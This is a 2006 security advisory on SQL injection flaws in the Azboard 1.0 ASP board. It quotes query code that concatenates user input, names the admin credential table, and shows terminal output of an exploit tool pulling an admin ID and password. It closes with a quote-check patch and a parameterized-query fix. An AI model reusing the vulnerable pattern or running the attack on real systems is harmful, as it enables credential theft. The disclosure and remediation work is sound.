Azboard <= 1.0 Multiple Sql Injections



Title : Azboard <= 1.0 Multiple Sql Injections

Published : 2006.5.14
Author : x90c(정경주)@chollian.net/~jyj9782/
Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt

0x01 Summary

 Azboard is a web board written in ASP (Active Server Pages).
It has a SQL injection hole, so we can get the admin (bbs)
ID and password, and so on. Let's look at the code.


0x02 Codes

~/azboard/list.asp:
-
' list.asp, lines 49-53: request values are concatenated into the SQL text
    if searchstring<>"" then
	sql="select count(board_idx) from board where " & search & " like '%" & searchstring & "%' and cate='"&cate&"' "
    else
	sql="select count(board_idx) from board where cate='"&cate&"'"
    end if
-

   The lines above are vulnerable to SQL attack, as you can see: search, searchstring and cate are concatenated straight into the query string. y0! ;)~


~/azboard/admin_ok.asp:
-
' admin_ok.asp, line 27
SQL = "SELECT cate,admin_id,admin_pass,board_name FROM board_admin where admin_id='"&id&"' and cate='"&cate&"'"
-

   I found the fields ('admin_id', 'admin_pass') and the table ('board_admin') in this file.


0x03 Exploit

[root@ebp exploits]# ls -al azboard_blue.c
-rw-r--r--    1 root     root         4771  5월 14 23:30 azboard_blue.c
[root@ebp exploits]# ls -al azboard_blue
-rwxr-xr-x    1 root     root        17163  5월 14 23:30 azboard_blue
[root@ebp exploits]#
[root@ebp exploits]# make azboard_blue
cc     azboard_blue.c   -o azboard_blue
azboard_blue.c: In function `tu1':
azboard_blue.c:55: warning: assignment makes pointer from integer without a cast
azboard_blue.c:59: warning: assignment makes pointer from integer without a cast
azboard_blue.c:63: warning: assignment makes pointer from integer without a cast
azboard_blue.c:67: warning: assignment makes pointer from integer without a cast
[root@ebp exploits]# ./azboard_blue


 azaboard 1.0 <= 0day :

 $ ./azboard_blue



~ x90c@chollian.net/~jyj9782

[root@ebp exploits]#
[root@ebp exploits]# ./azboard_blue http://192.168.0.5 testbbs
[ LANG=KOR admin id ] admin
[ LANG=KOR admin pass ] 1234
[root@ebp exploits]#


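0x04 Patch

~/azboard/list.asp:
..
' Reject a single quote in any of the three values that list.asp puts into the query.
' VBScript strings have no backslash escape, so the quote is written as "'".
if instr(search, "'") > 0 or instr(searchstring, "'") > 0 or instr(cate, "'") > 0 then
	Response.redirect "error.asp"
end if
..
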
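A quote check does not cover search, which list.asp places in the query as a bare column name, so a sturdier fix binds the values as parameters and takes the column from a fixed list. The block below is an added example, not code from this advisory or from Azboard; the open connection object conn, the allowlisted column names, the parameter sizes and both function names are assumptions.

```vbscript
<%
' Added example, not Azboard code. Assumptions: conn is an open
' ADODB.Connection; the column names and sizes below are hypothetical.
Const adVarChar = 200      ' ADO DataTypeEnum
Const adParamInput = 1     ' ADO ParameterDirectionEnum
Const adCmdText = 1        ' ADO CommandTypeEnum

' A column name cannot be bound as a parameter, so the user-supplied
' "search" value only selects an entry from a fixed allowlist.
Function SafeSearchColumn(ByVal requested)
    Dim allowed, i
    allowed = Array("title", "writer", "content")   ' hypothetical columns
    SafeSearchColumn = ""
    For i = 0 To UBound(allowed)
        If StrComp(requested, allowed(i), vbTextCompare) = 0 Then
            SafeSearchColumn = allowed(i)
            Exit Function
        End If
    Next
End Function

' Returns the post count, or -1 when "search" is not an allowed column.
Function CountPosts(conn, ByVal search, ByVal searchstring, ByVal cate)
    Dim cmd, rs, col
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    If searchstring <> "" Then
        col = SafeSearchColumn(search)
        If col = "" Then
            CountPosts = -1
            Exit Function
        End If
        cmd.CommandText = "select count(board_idx) from board where " & _
                          col & " like ? and cate = ?"
        cmd.Parameters.Append cmd.CreateParameter("pattern", adVarChar, _
            adParamInput, 255, "%" & Left(searchstring, 253) & "%")
    Else
        cmd.CommandText = "select count(board_idx) from board where cate = ?"
    End If
    cmd.Parameters.Append cmd.CreateParameter("cate", adVarChar, _
        adParamInput, 50, Left(cate, 50))
    Set rs = cmd.Execute
    CountPosts = rs(0).Value
    rs.Close
End Function
%>
```

The same parameter binding applies to the admin_ok.asp query, where id and cate would each become a ? placeholder.
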
Thanks for many 0p3n-H4ck3rz!



- Blu3h4t Team.

